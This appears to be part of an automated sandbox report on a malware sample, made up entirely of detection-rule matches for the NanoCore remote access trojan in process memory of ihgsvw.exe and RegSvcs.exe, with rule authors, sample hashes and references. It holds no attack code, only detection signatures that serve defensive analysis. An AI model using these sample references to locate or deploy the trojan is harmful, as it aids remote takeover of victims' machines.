      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
